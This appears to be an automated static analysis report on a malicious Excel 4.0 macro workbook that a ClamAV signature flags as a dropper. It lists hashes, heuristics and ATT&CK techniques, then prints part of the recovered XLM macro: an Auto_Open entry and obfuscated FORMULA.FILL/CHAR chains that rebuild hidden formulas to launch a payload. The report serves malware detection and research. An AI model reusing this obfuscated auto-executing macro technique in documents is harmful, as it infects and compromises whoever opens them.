Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1236ca8e758869c9…

MALICIOUS

Office (OLE)

174.5 KB Created: 2020-05-13 09:54:33 Authoring application: Microsoft Excel First seen: 2020-05-25
MD5: e928faf192f8b2dc5983a5cb41500dd5 SHA-1: 3b2496948c79a159a3907030f02d3a6ba4b8d930 SHA-256: 1236ca8e758869c98197aac5106cf647fe56b4f6bf8365b4f6b0a657b45216ec
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file is an Excel 4.0 macro-enabled workbook that contains an Auto_Open macro. Heuristics indicate the use of dangerous functions like RUN, suggesting it is designed to execute a secondary payload. ClamAV detection further confirms its malicious nature as a dropper.

Heuristics 4

  • ClamAV: Xls.Dropper.Agent-7819198-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7819198-0
  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 126190 bytes
SHA-256: afbd12bef2bd65f133abd30b98bf1bda2ce830ab3a0e89b75b433f90831d7d17
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!T22220 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,EF2,"",319.00000000000000000000
'  Sheet,JN3,"",-0.27125506072874494556
'  Sheet,HA21,"",401.00000000000000000000
'  Sheet,HO34,"",-269.00000000000000000000
'  Sheet,IJ44,"",0.00000000000000000000
'  Sheet,F51,"",-2.94047619047619068766
'  Sheet,HF59,"",-568.00000000000000000000
'  Sheet,FE89,"",231.00000000000000000000
'  Sheet,JM103,"",-0.24285714285714285476
'  Sheet,DG143,"",-16.00000000000000000000
'  Sheet,DC162,"",213.00000000000000000000
'  Sheet,FL171,"",-1.00000000000000000000
'  Sheet,IO181,"",-0.18888888888888888395
'  Sheet,EC192,"",0.73333333333333328152
'  Sheet,GF303,"",-4.81818181818181834331
'  Sheet,BB305,"",-415.62500000000000000000
'  Sheet,FC327,"",286.00000000000000000000
'  Sheet,IM355,"",0.05555555555555555247
'  Sheet,ER362,"",145.00000000000000000000
'  Sheet,DW381,"",-0.19028340080971659076
'  Sheet,CL382,"",4.46835443037974666680
'  Sheet,F439,"",2.13043478260869578733
'  Sheet,DD440,"",3.79569892473118297715
'  Sheet,ET446,"",177.00000000000000000000
'  Sheet,GL466,"",260.00000000000000000000
'  Sheet,EO656,"",-0.37651821862348178183
'  Sheet,O657,"",-143.00000000000000000000
'  Sheet,BH709,"",5.26865671641791077917
'  Sheet,JT709,"",0.11111111111111110494
'  Sheet,JI715,"",-26.00000000000000000000
'  Sheet,DT720,"",8.37254901960784359005
'  Sheet,DS742,"",-4.66037735849056566906
'  Sheet,V789,"",545.00000000000000000000
'  Sheet,IL806,"",-567.00000000000000000000
'  Sheet,HC850,"",1.75892857142857139685
'  Sheet,FY944,"FORMULA.FILL(CHAR(GH22172-FL171)&CHAR(GH22172/GL3274)&CHAR(L1792-BM39822)&CHAR(L1792*BS14056)&CHAR(IZ54844-JN62167)&CHAR(HN56344*FS1451)&CHAR(FD41003/BJ44225)&CHAR(IZ54844/BK19420)&CHAR(L1792-FH9519)&CHAR(FD41003+DV62033)&CHAR(CZ60163-HA30445)&CHAR(HA21781*CM9922)&CHAR(L1792-IH5987)&CHAR(FD41003/BO41290)&CHAR(CZ60163+IK63175)&CHAR(HN56344*FL26672)&CHAR(HA21781*DG6217)&CHAR(HA21781*EB3726)&CHAR(IZ54844/GY34718)&CHAR(GH22172+IW45117)&CHAR(FD41003-GM35273)&CHAR(L1792*HJ34141)&CHAR(GH22172-HV40531)&CHAR(L1792*JD57976)&CHAR(L1792*L59902)&CHAR(IZ54844/DG44747)&CHAR(CZ60163-HG9006)&CHAR(IZ54844*IJ56109)&CHAR(EC42994/DZ56957)&CHAR(HA21781+GC23113)&CHAR(HN56344/DY19234)&CHAR(IZ54844/X5050)&CHAR(GH22172+EI30325)&CHAR(FD41003-HT7851),JI48399)",""
'  Sheet,FY945,GOTO(JK64244),""
'  Sheet,EV1065,"",2.59210526315789469010
'  Sheet,ID1102,"",155.00000000000000000000
'  Sheet,JQ1177,"",7.46341463414634187501
'  Sheet,BS1234,"",2.66216216216216228219
'  Sheet,JJ1234,"",0.14869281045751633896
'  Sheet,HS1249,"",-0.46558704453441296378
'  Sheet,FU1254,"",388.62500000000000000000
'  Sheet,HR1256,"",284.00000000000000000000
'  Sheet,DC1307,"",-336.00000000000000000000
'  Sheet,IO1341,"",-0.29554655870445345478
'  Sheet,IP1354,"",292.00000000000000000000
'  Sheet,FK1409,"",-301.00000000000000000000
'  Sheet,R1415,"",-349.00000000000000000000
'  Sheet,BO1435,"",440.00000000000000000000
'  Sheet,FS1451,"",-0.62222222222222223209
'  Sheet,FV1536,"",-238.00000000000000000000
'  Sheet,BR1538,"",530.00000000000000000000
'  Sheet,P1544,"",11.12727272727272698205
'  Sheet,BU1579,"FORMULA.FILL(CHAR(GJ35831-BN30163)&CHAR(DI1826+BG31375)&CHAR(DA51790/FU17203)&CHAR(GF53492/IK6530)&CHAR(CI34785/FH51728)&CHAR(FY63197+G16071)&CHAR(DI1826-X40459)&CHAR(GE3002-DC63248)&CHAR(CP50473*P54882)&CHAR(CI34785*DW381)&CHAR(GJ35831+HJ53825)&CHAR(CP50473-BA16844)&CHAR(GJ35831+DF23181)&CHAR(CI34785*HS1249)&CHAR(GF53492-IW61553)&CHAR(GE3002*IG27297)&CHAR(FY63197/CA15386)&CHAR(GF53492*JU19608)&CHAR(GE3002/EW24957)&CHAR(GY58288/GH24056)&CHAR(CP50473*CN10631)&CHAR(GJ35831+CS52600)&CHAR(GJ35831/FF22880)&CHAR(DI1826-IT3239)&CHAR(IO2387*FW2179)&
... (truncated)